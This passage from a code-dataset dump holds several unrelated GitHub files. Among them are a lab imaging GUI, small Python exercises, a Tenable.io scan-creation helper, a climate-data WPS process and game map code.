cmap='inferno', aspect='equal')\n image_frame.canvas.draw() \n \n#%% main startup\nif __name__ == \"__main__\":\n from pathlib import Path\n import tkinter as tk\n from sys import platform\n import socket\n from project_manager.ProjectManager import ProjectManager\n import urllib3\n import os\n import pandas as pd\n\n\n house_PC='DESKTOP-V1MT0U5'\n lab_PC='DESKTOP-OKLQSQS'\n small_laptop_ubuntu='samuel-XPS-13-9380'\n small_laptop_kali='samuel-XPS-13-9380'\n big_laptop_ubuntu='samuel-XPS-15-9560'\n big_laptop_arch='samuel-XPS-15-9560'\n\n if platform == \"win32\":\n if socket.gethostname()==house_PC:\n githubtoken_path=r'C:\\Users\\Samuel\\Documents\\Github\\GitHubToken.txt'\n computer=house_PC\n elif socket.gethostname()==lab_PC:\n githubtoken_path=r'C:\\Users\\sp3660\\Documents\\Github\\GitHubToken.txt'\n computer=lab_PC\n \n elif platform == \"linux\" or platform == \"linux2\":\n if socket.gethostname()==small_laptop_ubuntu:\n computer=small_laptop_ubuntu\n githubtoken_path='/home/samuel/Documents/Github/GitHubToken.txt'\n # Path('/home/samuel/Documents/Github/GitHubToken.txt')\n print('TO DO')\n\n ProjectManager=ProjectManager(githubtoken_path, computer, platform)\n gui=0\n lab=ProjectManager.initialize_a_project('LabNY', gui) \n datamanaging=lab.datamanaging\n session_name='20220213'\n # for sessions not yet in the database\n datamanaging.all_existing_sessions_not_database_objects[session_name].read_all_yet_to_database_mice()\n mousename='SPJZ'\n testing=0\n gui2=1\n plot=0\n \n \n#%% testing\n \n if testing:\n \n pass\n \n #% dataset explorations visualizations\n # mouse_code='SPJM'\n # datamanaging.all_existing_sessions_not_database_objects\n \n \n # aldatasetss=datamanaging.all_experimetal_mice_objects[mouse_code].\\\n # all_mouse_acquisitions['20211111_FOV_1_211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000'].\\\n # all_datasets\n \n # green_datasets= [v for key, v in aldatasetss.items() if 'Green' in key ] \n # acq=datamanaging.all_experimetal_mice_objects[mouse_code].\\\n # all_mouse_acquisitions['20211111_FOV_1_211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000']\n \n # dat1=aldatasetss['211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000_Plane1_Green']\n \n # test=dat1.summary_images_object.projection_dic['std_projection_path']\n # mouse_codes=datamanaging.all_existing_sessions_not_database_objects[session_name].session_imaged_mice_codes\n \n # mouse_code='SPKG'\n # mouse_object=datamanaging.all_experimetal_mice_objects[mouse_code]\n # imaging_session=mouse_object.imaging_sessions_not_yet_database_objects[session_name]\n # os.startfile(imaging_session.mouse_session_path)\n \n # acqs=[datamanaging.all_experimetal_mice_objects[mouse_code].all_mouse_acquisitions for mouse_code in mouse_codes]\n # imaging_session=[datamanaging.all_experimetal_mice_objects[mouse_code] for mouse_code in mouse_codes]\n \n # fullalen=acqs[1][list(acqs[1].keys())[-2]]\n \n # fullalen.face_camera.full_eye_camera.play()\n # test=pd.DataFrame(fullalen.voltage_signals_dictionary['Locomotion'])\n # test.plot()\n \n # fullalen.metadata_object\n \n # fullalen.all_datasets\n # surface=list(fullalen.FOV_object.all_datasets[-1].values())[0]\n # surface_green=list(surface.all_datasets.values())[0]\n # surface_red=list(surface.all_datasets.values())[0]\n # surface_green.summary_images_object.plotting()\n # surface_red.summary_images_object.plotting()\n \n # fullalgrenplane1=fullalen.all_datasets[list(fullalen.all_datasets.keys())[0]]\n # 
fullalgrenplane1.kalman_object.dataset_kalman_caiman_movie.play(fr=1000)\n # fullalgrenplane1.summary_images_object.plotting()\n # # %matplotlib qt\n # fullalgrenplane1.most_updated_caiman.cnm_object.estimates.view_components()\n # fullalgrenplane1.selected_dataset_mmap_path\n # os.startfile(fullalgrenplane1.selected_dataset_mmap_path)\n \n # coord0=list(fullalen.FOV_object.mouse_imaging_session_object.all_0coordinate_Aquisitions.values())[0]\n # widef=fullalen.FOV_object.mouse_imaging_session_object.widefield_image[list(fullalen.FOV_object.mouse_imaging_session_object.widefield_image.keys())[0]]\n # widef.plot_image()\n \n \n # fullalen.face_camera.full_eye_camera.play()\n # fullalgrenplane1.most_updated_caiman.cnm_object.estimates.view_components()\n # fullalgrenplane1.kalman_object.dataset_kalman_caiman_movie.play(fr=1000)\n#%% plotting\n if plot:\n \n # outfigures=1\n # if outfigures:\n # %matplotlib qt\n # else:\n # %matplotlib qt\n \n signals.plot_speed()\n signals.plot_vis_stim_trace()\n signals.plot_stim_and_speed()\n \n \n\n plot_time =np.arange(0,wsmoothemcmc.shape[1])/caimanresults.data['ops']['init_params_caiman']['data']['fr']\n signals.time_scale\n \n fig, ax=plt.subplots(4,1, sharex=True)\n ax[1].imshow(wsmoothemcmc, aspect='auto', cmap='binary',vmax=0.02,extent=[0,plot_time[-1],0,8])\n ax[1].set_yticks(np.arange(1, 8, 1))\n ax[0].imshow(denoised, aspect='auto', cmap='binary',vmax=20,extent=[0,plot_time[-1],0,8])\n ax[0].set_yticks(np.arange(1, 8, 1))\n # ax[0].pcolor([plot_time,8],wsmoothemcmc,cmap='binary',vmax=0.02)\n # ax[0].pcolor(wsmoothemcmc,cmap='binary',vmax=0.02)\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n \n # fig, ax=plt.subplots(3,1, sharex=True)\n # ax[0].imshow(wsmootheddfdt_thres, aspect='auto', cmap='binary',vmax=0.02,extent=[0,plot_time[-1],0,8])\n # ax[0].set_yticks(np.arange(1, 8, 1))\n # # ax[0].pcolor([plot_time,8],wsmoothemcmc,cmap='binary',vmax=0.02)\n # # ax[0].pcolor(wsmoothemcmc,cmap='binary',vmax=0.02)\n # ax[1].plot(signals.time_scale,wspeed) \n # ax[2].plot(signals.time_scale,wvisstim) \n \n # for cell in range(7):\n for cell in pyrcellindexactivity:\n \n fig, ax=plt.subplots(4,1, sharex=True)\n ax[0].plot(plot_time,denoised[cell,:])\n ax[1].plot(plot_time,wsmoothemcmc[cell,:])\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n \n for cell in intercellindexactivity:\n \n fig, ax=plt.subplots(4,1, sharex=True)\n ax[0].plot(plot_time,denoised[cell,:])\n ax[1].plot(plot_time,wsmoothemcmc[cell,:])\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n # for cell in range(7):\n # fig, ax=plt.subplots(4,1, sharex=True)\n # ax[0].plot(plot_time,denoised[cell,:])\n # ax[1].plot(plot_time,wsmootheddfdt_thres[cell,:])\n # ax[2].plot(signals.time_scale,wspeed) \n # ax[3].plot(signals.time_scale,wvisstim) \n \n pixel_per_bar = 4\n dpi = 100\n # fig = plt.figure(figsize=(6+(200*pixel_per_bar/dpi), 10), dpi=dpi)\n fig = plt.figure(figsize=(16,9), dpi=dpi)\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n # ax.set_axis_off()\n ax.imshow(analysis.corrected_traces, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 10), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n ax.set_axis_off()\n ax.imshow(analysis.spike_traces, cmap='binary', 
aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.02), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n ax.set_axis_off()\n ax.imshow( analysis.binary_spikes, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.05), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n #% plotting for rafa gran\n\n plot_time =np.arange(0,wsmoothemcmc.shape[1])/caimanresults.data['ops']['init_params_caiman']['data']['fr']\n signals.time_scale\n \n \n pixel_per_bar = 4\n dpi = 100\n # fig = plt.figure(figsize=(6+(200*pixel_per_bar/dpi), 10), dpi=dpi)\n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n # ax.set_axis_off()\n ax.imshow(wsmoothemcmc, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.02), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n\n fig.savefig('Full Raster'+\".svg\")\n fig.savefig('Full Raster'+\".pdf\")\n fig.savefig('Full Raster'+\".png\")\n\n\n\n fig, ax=plt.subplots(len(pyrcellindexactivity),1,figsize=(16,9), sharex=True,sharey=True)\n fig.suptitle('Pyramidal Cells', fontsize=16, y=0.95)\n fig.supylabel('Activity', x=0.08)\n fig.subplots_adjust(hspace=0)\n for i,cell in enumerate( pyrcellindexactivity):\n ax[i].plot(plot_time,wsmoothemcmc[cell,:])\n ax[i].margins(x=0)\n ax[-1].set_xlabel('Time (s)')\n\n fig.savefig('Pyramidal_Examples'+\".svg\")\n fig.savefig('Pyramidal_Examples'+\".pdf\")\n fig.savefig('Pyramidal_Examples'+\".png\")\n\n\n\n \n fig, ax=plt.subplots(len(intercellindexactivity),1,figsize=(16,9), sharex=True,sharey=True)\n fig.suptitle('Interneurons', fontsize=16,y=0.95)\n fig.supylabel('Activity', x=0.08)\n fig.subplots_adjust(hspace=0)\n for i,cell in enumerate( intercellindexactivity):\n ax[i].plot(plot_time,wsmoothemcmc[cell,:])\n ax[i].margins(x=0)\n\n ax[-1].set_xlabel('Time (s)')\n fig.savefig('Interneuron_Examples'+\".svg\")\n fig.savefig('Interneuron_Examples'+\".pdf\")\n fig.savefig('Interneuron_Examples'+\".png\")\n \n#%% opening the vis app\n if gui2:\n root = tk.Tk()\n app = ImagingSessionPanel(root, session_date=session_name, datamanaging=datamanaging)\n root.mainloop()\n # test=app.micebrought_info\n","repo_name":"Samuel8789/LabNY","sub_path":"ny_lab/gui/tabs/dataProcessing/imagingSessionPanel.py","file_name":"imagingSessionPanel.py","file_ext":"py","file_size_in_byte":56245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1279601396","text":"class Node:\n def __init__(self, dataval=None):\n self.dataval = dataval\n self.nextval = None\n\nclass SLinkedList:\n def __init__(self):\n self.headval = None\n\n def begin(self, data):\n nNode = Node(data)\n nNode.nextval = self.headval\n self.headval = nNode\n\n def end(self, data):\n nNode = Node(data)\n if not self.headval:\n # appending to an empty list just sets the head\n self.headval = nNode\n return\n node = self.headval\n while node.nextval:\n node = node.nextval\n node.nextval = nNode\n\n def after(self, after, data):\n nNode = Node(data)\n node = self.headval\n # walk to the node whose value matches 'after', then splice the new node in behind it\n while node.dataval != after:\n node = node.nextval\n nNode.nextval = node.nextval\n node.nextval = nNode\n\n def cycle(self):\n def inner_cy(node):\n print(node.dataval)\n if node.nextval: inner_cy(node.nextval)\n 
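# start the recursive traversal from the head of the list\n 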
inner_cy(self.headval)\n\n\nlist1 = SLinkedList()\nlist1.headval = Node(\"Mon\")\ne2 = Node(\"Tue\")\ne3 = Node(\"Wed\")\n# Link first Node to second node\nlist1.headval.nextval = e2\n\n# Link second Node to third node\ne2.nextval = e3\n\n# Insert at top\nlist1.begin(\"Sun\")\n\n# Insert at end\nlist1.end(\"Fri\")\n\n# Insert between\nlist1.after(\"Wed\", \"Thu\")\n\nlist1.cycle()\n","repo_name":"Hosjev/Algo","sub_path":"GeeksForGeeks/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74603063768","text":"#!/usr/bin/env python3\n#\n# \tauthor: \thttps://github.com/m0nkeyplay/\n# \tfile Date: \t2019-07-10\n#\n# \tpurpose: \tCreate a new scan based on a json file\n# Use pytenable to create the file\n# Requires: https://github.com/tenable/pyTenable\n#\n# notes: fill in the following variables as needed per environment\n# ak <-- Access Key\n# sk <-- Secret Key\n# proxies <-- If you use a proxy, set it here.\n# iUser <-- If you need to impersonate a user fill in username here\n# and uncomment tio.users.impersonate(iUser) at the end of the script\nimport logging\nimport requests\nimport json\nimport os\nimport time\nimport datetime\nimport sys\nimport signal\nfrom tenable.io import TenableIO\n\n#logging.basicConfig(level=logging.DEBUG)\n\nhello = '##########################################################################\\n'\nhello +='#\\n'\nhello +='# ^^^^Tenable IO Scan Creator^^^^\\n'\nhello +='#\\n'\nhello +='# Gather data...\\n'\nhello +='# Create a json template...\\n'\nhello +='# Stop all those clicks in the GUI :-) \\n'\nhello +='##########################################################################\\n'\n\nholdOnCowboy = '++++ It looks like the environment isn\\'t set up yet.'\nholdOnCowboy +='\\nPlease set up the environment variables first. (ak and sk)\\n'\nholdOnCowboy +='Once those are set you should be on your way.'\n\nlameCreateError = 'Fatal Error. Scan was not created. '\nlameCreateError += 'Hopefully there is a more in-depth error message above this?'\n\n# CTRL+C handler - from https://gist.github.com/mikerr/6389549\ndef handler(signum, frame):\n print(\"\\n^^^^^^Task aborted by user. 
Some cleanup may be necessary.\")\n exit(0)\n\nsignal.signal(signal.SIGINT,handler)\n\n# Environment Variables\nlog_time = datetime.datetime.now().strftime('%Y%B%d%H%M%p')\ncwd = os.getcwd()\nak = ''\nsk = ''\niUser = ''\n\nproxies = {}\nproxies['https']= ''\nproxies['http']= ''\n\ntry:\n ak\n sk\n tio = TenableIO(ak,sk,proxies=proxies)\nexcept:\n print(holdOnCowboy)\n exit()\n\nh_key_data = 'accessKey='+ak+'; secretKey='+sk\n\nheaders = {}\nheaders['content-type']= 'application/json'\nheaders['x-apikeys']= h_key_data\n\n# URLs for environment data\nscan_template_url = 'https://cloud.tenable.com/editor/scan/templates'\npolicy_template_url = 'https://cloud.tenable.com/editor/policy/templates'\nscanners_url = 'https://cloud.tenable.com/scanners'\ncredentials_url = 'https://cloud.tenable.com/credentials'\npolicy_url = 'https://cloud.tenable.com/policies'\nfolders_url = 'https://cloud.tenable.com/folders'\nagent_groups_url = 'https://cloud.tenable.com/scanners/0/agent-groups'\ntimeZones_url = 'https://cloud.tenable.com/scans/timezones'\n\n\n# Loopy functions\ndef explode_dictionary(item):\n for k,v in item.items():\n if type(v) is dict:\n explode_dictionary(v)\n else:\n print(str(k)+': '+str(v))\n\ndef print_data(log_file,**kwargs):\n for k, v in kwargs.items():\n if type(v) is dict:\n log_file.write(k+':\\n')\n print_data(log_file,**v)\n else:\n log_file.write(\"{}: {}\\n\".format(k,v))\n\ndef create_log(url,loopThrough):\n log_name = 'IO_'+loopThrough+'-'+log_time+'.txt'\n log = open(cwd+'/logs/'+log_name, 'w')\n r = requests.get(url, proxies=proxies, headers=headers)\n data = r.json()\n for d in data[loopThrough]:\n print_data(log,**d)\n log.write(\"***********************\\n\")\n log.close()\n print(log_name+\" was successfully written to logs/ \")\n\n# Check for the json file\n# This does not check if it's valid - just that it exists\ndef check_jsonFile():\n theJSON = True\n print(\"We will need a valid json.\")\n while theJSON:\n scanFile = input(\"Path to your JSON file please:\")\n if os.path.exists(scanFile):\n print(\"File exists. Loading it up...\")\n return scanFile\n else:\n print(\"Please provide the correct path to the json file.\")\n\n# Here we go - get interactive\nprint(hello)\nprep = True\nprint(\"The environment files creator will allow you to look for data to populate your JSON file.\")\nwhile prep:\n choice = input(\"Do you want to run environment files creator? y/n: \")\n if choice.lower() == 'y' or choice == 'n':\n seePrep = choice\n break\n else:\n print(\"^^^^^ y or n please ^^^^^\")\n\nif seePrep == 'y':\n print(\"Creating your environment files. Please be patient.\\n\")\n create_log(policy_template_url,'templates')\n create_log(scanners_url,'scanners')\n create_log(policy_url,'policies')\n create_log(folders_url,'folders')\n create_log(credentials_url,'credentials')\n create_log(agent_groups_url,'groups')\n create_log(timeZones_url,'timezones')\n print(\"\\nFiles are complete.\\nTake your time. Look at the files then...\\nCreate your json.\")\n scanFile = check_jsonFile()\nelse:\n print(\"Okay. Let's get moving with the JSON file.\")\n scanFile = check_jsonFile()\n\n# Open and show the data in json for verification\nscanJson = open(scanFile, 'r')\ndata = json.load(scanJson)\nprint(\"Here is what you will be submitting:\\n\")\nfor d in data['newScan']:\n explode_dictionary(d)\n\n# Send it\ngo = input(\"\\nLook good?\\nY to go. 
Any other key to quit.\")\nif go.lower() == 'y':\n print(\"Attempting to create the scan.\")\n for d in data['newScan']:\n template = (d['template'])\n try:\n creds = (d['credentials'])\n except:\n creds = ''\n try:\n compliance = (d['audits'])\n except:\n compliance = ''\n try:\n # Uncommnet below if using impersonation\n #tio.users.impersonate(iUser)\n if compliance and creds:\n #Compliance Scan\n scan = tio.scans.create(template=template,credentials=creds,compliance=compliance,**d[\"settings\"])\n elif creds and not compliance:\n #A scan with Credentials\n scan = tio.scans.create(template=template,credentials=creds,**d[\"settings\"])\n else:\n #A Basic Scan\n scan = tio.scans.create(template=template,**d[\"settings\"])\n newScanName = 'newScan-'+log_time+'.txt'\n newScanLog = open(cwd+'/logs/'+newScanName, 'w')\n for k,v in scan.items():\n newScanLog.write(k+': '+str(v)+'\\n')\n print(\"New Scan created. Log file: \"+newScanName)\n newScanLog.close()\n except:\n exit(lameCreateError)\nelse:\n exit(\"That's cool. Fix that json and we can try another time.\\Bye.\")\n","repo_name":"m0nkeyplay/tenableIO-create-scan","sub_path":"createScanIO.py","file_name":"createScanIO.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18595954531","text":"#take three numbers as input from the user and check the greatest of them.\n\nf=int(input(\"enter first number:\"))\ns=int(input(\"enter second number:\"))\nl=int(input(\"enter third number:\"))\nif f>s and f>l:\n\tprint(\"first number is greater\")\nelif s>f and s>l:\n\tprint(\"second number is greater\")\nelse:\n\tprint(\"third number is greater\")","repo_name":"prabhatdash/Informatics_Practices","sub_path":"class11/Question Bank/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34837114585","text":"from replit import db\n\n# db[\"test\"] = \"hello there\"\n\n#keys = db[\"test\"]\n#print(keys)\n\n# objective\n# menu add/view tweets\n# if view: get timestamp of tweet\n# key of tweets => timestamp = datetime.datetime.now()\n# view tweets, show in reverse chronological order (most recent first)\n# only show 10 at a time\n# ask user if they want to see the next 10, if not, go back to main menu\nimport os, datetime\n\ndef addTweet():\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n value = input(\"Insert thoughts: \")\n db[timestamp] = value\n print()\n \ndef viewTweets():\n os.system(\"clear\")\n matches = db.prefix(\"2023\")\n matches = matches[::-1]\n counter = 0\n for i in matches:\n print(db[i])\n counter += 1\n if counter % 10 == 0:\n nextPage = input(\"View next page? (y/n): \")\n os.system(\"clear\")\n if nextPage.lower() == \"n\":\n break\n print()\n \nwhile True:\n print(\"Welcome to Tweeetr\")\n menu = input(\"1. Add tweet\\n2. 
View tweets\\n> \")\n\n if menu == \"1\":\n os.system(\"clear\")\n addTweet()\n elif menu == \"2\":\n viewTweets()\n else:\n break\n","repo_name":"alexbraic/replit_100PythonDays","sub_path":"days/day61.py","file_name":"day61.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23089776989","text":"def solution(triangle):\n answer = 0\n tmp = list()\n for i in range(0, len(triangle)):\n if i == 0:\n tmp.append(triangle[i])\n continue\n\n return answer\n\nprint(solution([[7], [3, 8], [8, 1, 0], [2, 7, 4, 4], [4, 5, 2, 6, 5]]))","repo_name":"zeee1/programmers","sub_path":"src/general/DP_Ntriangle.py","file_name":"DP_Ntriangle.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71696818329","text":"from pywps.Process.Process import WPSProcess \n\nfrom os.path import expanduser\nfrom mkdir_p import *\nfrom datetime import datetime\nimport base64\nimport time\nfrom clipc_combine_process import extractnuts\n\nhome = expanduser(\"~\")\n\nimport logging;\nlogging.debug(\"Something has been debugged\")\n\n# python\n# clipc combine process\n# combine two netCDFs\n# knmi team\n# authors: maarten, andrej\n# clipc@knmi.nl\n#\n\n\nclass Process(WPSProcess):\n def __init__(self):\n # init process\n WPSProcess.__init__(self,\n identifier=\"clipc_extractnuts_execute\", #the same as the file name\n title=\"CLIPC Create statistics per NUTS region Execute\",\n version = \"1.0\",\n storeSupported = \"true\",\n statusSupported = \"true\",\n abstract=\"The NUTS extractor calculates statistics for any NetCDF file by extracting geographical areas defined in a GeoJSON file. The statistics per geographical area include minimum, maximum, mean and standard deviation. 
The statistics are presented in a CSV table and a NetCDF file.\",\n grassLocation =False)\n \n self.input1 = self.addLiteralInput(identifier=\"input1\",\n title=\"File A\",\n abstract=\"application/netcdf\",\n default = \"http://opendap.knmi.nl/knmi/thredds/dodsC/CLIPC/storyline_urbanheat/geojson/NUTS_2010_L0.geojson.nc\",\n type = type(\"String\")) \n\n self.input2 = self.addLiteralInput(identifier=\"input2\",\n title=\"File B\",\n abstract=\"application/netcdf\",\n default = \"http://opendap.knmi.nl/knmi/thredds/dodsC/IS-ENES/TESTSETS/tas_day_EC-EARTH_rcp26_r8i1p1_20060101-20251231.nc\",\n type = type(\"String\")) \n\n self.bbox = self.addLiteralInput(identifier = \"bbox\",title = \"Bounding box\",type=\"String\",minOccurs=4,maxOccurs=4,default=\"-40,20,60,85\")\n self.time2 = self.addLiteralInput(identifier = \"time2\",title = \"Time B\",type=\"String\",minOccurs=1,maxOccurs=1,default=\"2016-08-29T12:00:00Z\")\n self.width = self.addLiteralInput(identifier = \"width\" ,title = \"Width\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"1500\")\n self.height = self.addLiteralInput(identifier = \"height\" ,title = \"Height\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"1500\")\n self.crs = self.addLiteralInput(identifier = \"crs\" ,title = \"Coordinate reference system\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"EPSG:4326\")\n self.tags = self.addLiteralInput(identifier = \"tags\",title = \"Your tag for this process\",type=\"String\",default=\"provenance_research_knmi\");\n self.netcdfnutsstatfilename = self.addLiteralInput(identifier=\"netcdfnutsstatfilename\",title = \"NetCDF outputfile with geographical statistics\",type=\"String\",default=\"nutstat.nc\")\n self.csvnutsstatfilename = self.addLiteralInput(identifier=\"csvnutsstatfilename\",title = \"CSV outputfile with statistics in table form\",type=\"String\",default=\"nutstat.csv\")\n \n self.netcdfnutsstatout = self.addLiteralOutput(identifier = \"netcdfnutsstatout\",title = \"NetCDF outputfile with geographical statistics\");\n self.csvnutsstatout = self.addLiteralOutput(identifier = \"csvnutsstatout\",title = \"CSV outputfile with statistics in table form\");\n self.csvnutsstatdata = self.addLiteralOutput(identifier = \"csvnutsstatdata\",title = \"CSV with statistics in table form\");\n\n\n def callback(self,message,percentage):\n self.status.set(\"Processing: [%s]\" % message,percentage);\n \n def execute(self):\n def callback(message,percentage):\n self.callback(message,percentage)\n tmpFolderPath=os.getcwd()\n os.chdir(home)\n\n\n self.status.set(\"Preparing....\", 0)\n \n pathToAppendToOutputDirectory = \"/WPS_\"+self.identifier+\"_\" + datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")\n \n \"\"\" URL output path \"\"\"\n fileOutURL = os.environ['POF_OUTPUT_URL'] + pathToAppendToOutputDirectory+\"/\"\n \n \"\"\" Internal output path\"\"\"\n fileOutPath = os.environ['POF_OUTPUT_PATH'] + pathToAppendToOutputDirectory +\"/\"\n\n \"\"\" Create output directory \"\"\"\n mkdir_p(fileOutPath)\n self.status.set(\"Starting....\", 1)\n \n bbox = self.bbox.getValue()[0]+\",\"+self.bbox.getValue()[1]+\",\"+self.bbox.getValue()[2]+\",\"+self.bbox.getValue()[3];\n time2 = self.time2.getValue();\n width = int(self.width.getValue())\n height = int(self.height.getValue())\n\n CSV = extractnuts.nutsCombine(self.input1.getValue(),\n self.input2.getValue(),\n bbox= bbox,\n time=time2,\n width=width,\n height=height,\n crs= self.crs.getValue(),\n outncfile=fileOutPath+self.netcdfnutsstatfilename.getValue(),\n 
outcsvfile=fileOutPath+self.csvnutsstatfilename.getValue(),\n callback=callback) \n\n #The final answer \n self.netcdfnutsstatout.setValue(fileOutURL+\"/\"+self.netcdfnutsstatfilename.getValue());\n self.csvnutsstatout.setValue(fileOutURL+\"/\"+self.csvnutsstatfilename.getValue());\n self.csvnutsstatdata.setValue(\"base64:\"+base64.b64encode(CSV));\n self.status.set(\"Finished....\", 100) \n","repo_name":"KNMI/impactwps","sub_path":"clipc_extractnuts_execute.py","file_name":"clipc_extractnuts_execute.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44999189457","text":"\"\"\"Offload some of block hidden map functionality due to function size\nget/set functions are still in block\n\"\"\"\n\nimport logging\nfrom collections import deque\n\nfrom .game import Game\nfrom .util import get_neighbors\n\nlog = logging.getLogger(__name__)\n\nclass HitSearchLimit(Exception):\n \"\"\"\n Exception for flood fill to throw out a tuple of already searched locations for\n The next flood search\n \"\"\"\n # pylint: disable=super-init-not-called\n # It is called right here. Thanks pylint\n def __init__(self, searched_locations):\n super(HitSearchLimit, self).__init__(\"Hit Search Limit for finding hidden area\")\n self.searched_locations = searched_locations\n\ndef generate_map(map_size):\n \"\"\"Have to generate most of the map at draw runtime due to boundry issues\"\"\"\n # TODO generate, ignore boundry tiles. Update boundry tiles when block available\n return [[None for _ in range(map_size)] for _ in range(map_size)]\n\ndef init_hidden(calling_block, x, y, cur_tile):\n \"\"\"\n For drawing. Just determines if the local tile needs to be\n hidden if it's adjacent to all adjacent hidden blocks\n \"\"\"\n # Get tiles adjacent to current tile and get their adjacent hiddent status\n neighbor_coords = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n neighbor_tiles = [calling_block.get_tile(*coord) for coord in neighbor_coords]\n adjacent_hidden_result = [neighbor_tile.adjacent_hidden for neighbor_tile in neighbor_tiles]\n\n # If the current tile is surrounded by adjacent_hidden tiles, make it hidden\n if all(adjacent_hidden_result):\n calling_block.hidden_map[x][y] = True\n # If the tile itself is not an adjacent hidden tile, then hide the surrounding tiles\n if not cur_tile.adjacent_hidden:\n for neighbor_coord in neighbor_coords:\n update_hidden(calling_block, *neighbor_coord, iteration=1)\n else:\n calling_block.hidden_map[x][y] = False\n\ndef update_hidden(calling_block, x, y, iteration=3):\n \"\"\"Updates the hidden status of a tile at x y relative to calling_block\n Used when surrounding tile state is changed\n\n iteration is for how many blocks to update surrounding it.\n \"\"\"\n # Get correct block if outside map bounds\n if 0 <= x < Game.map_size and 0 <= y < Game.map_size:\n blk = calling_block\n else:\n # Outside map bounds - get new block\n idx_mod = x // Game.map_size\n idy_mod = y // Game.map_size\n x = x % Game.map_size\n y = y % Game.map_size\n blk = calling_block.world.get(calling_block.idx + idx_mod,\n calling_block.idy + idy_mod)\n # Get surrounding tiles\n neighbor_coords = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n neighbor_tiles = [blk.get_tile(*coord) for coord in neighbor_coords]\n\n # Get surrounding tiles adjacent hidden attribute and map hidden\n adjacent_hidden_result = [neighbor_tile.adjacent_hidden for neighbor_tile in neighbor_tiles]\n hidden_map_result = [blk.get_hidden(*coord) 
for coord in neighbor_coords]\n\n # Group them together\n # If all of the surrounding tiles have either of these attributes,\n # then make the current tile hidden\n should_be_hidden = all(map(any, zip(adjacent_hidden_result, hidden_map_result)))\n\n if should_be_hidden:\n # Do not set hidden player\n if not (Game.min_x + Game.game_width//2, Game.min_y + Game.game_height//2) == (x, y):\n blk.hidden_map[x][y] = True\n else:\n blk.hidden_map[x][y] = False\n\n iteration -= 1\n # Now do this for the surrounding tiles too\n if not iteration < 0:\n for neighbor_coord in neighbor_coords:\n update_hidden(blk, *neighbor_coord, iteration=iteration)\n\n\ndef update_hidden_flood(calling_block, x, y, cur_adj_hidden, timeout_radius=Game.map_size//2):\n \"\"\" Detects a hidden area or the destruction of a hidden area due to change of\n tile state from calling_block at x, y\n\n If the cur_adj_hidden at x,y changed is False, then check for destruction\n (that is cur_adj_hidden is False)\n If cur_adj_hidden at x,y is True, then check for creation of hidden area\n (that is cur_adj_hidden is True)\n\n timeout_radius\n largest possible hidden area to check for before timing out\n \"\"\"\n # PARENT function of find hidden/unhidden\n #log.info(\"flood hidden call as %dx%d\", x, y)\n if 0 <= x < Game.map_size and 0 <= y < Game.map_size:\n blk = calling_block\n else:\n # pylint: disable=duplicate-code\n # performance constraints disallow me from putting this in a function.\n idx_mod = x // Game.map_size\n idy_mod = y // Game.map_size\n x = x % Game.map_size\n y = y % Game.map_size\n blk = calling_block.world.get(calling_block.idx + idx_mod,\n calling_block.idy + idy_mod)\n\n if cur_adj_hidden:\n #log.info(\"Looking for revealed hidden area\")\n # Potentially create hidden tiles\n neighbor_coords = get_neighbors(x, y)\n valid_coords = []\n for coord in neighbor_coords:\n tile_obj = blk.get_tile(*coord)\n if not tile_obj.adjacent_hidden and not blk.get_hidden(*coord):\n valid_coords.append(coord)\n #if len(valid_coords) > 3:\n # valid_coords = []\n\n searched_locations = []\n for coord in valid_coords:\n # Don't search overlapping regions\n if coord in searched_locations:\n continue\n\n try:\n 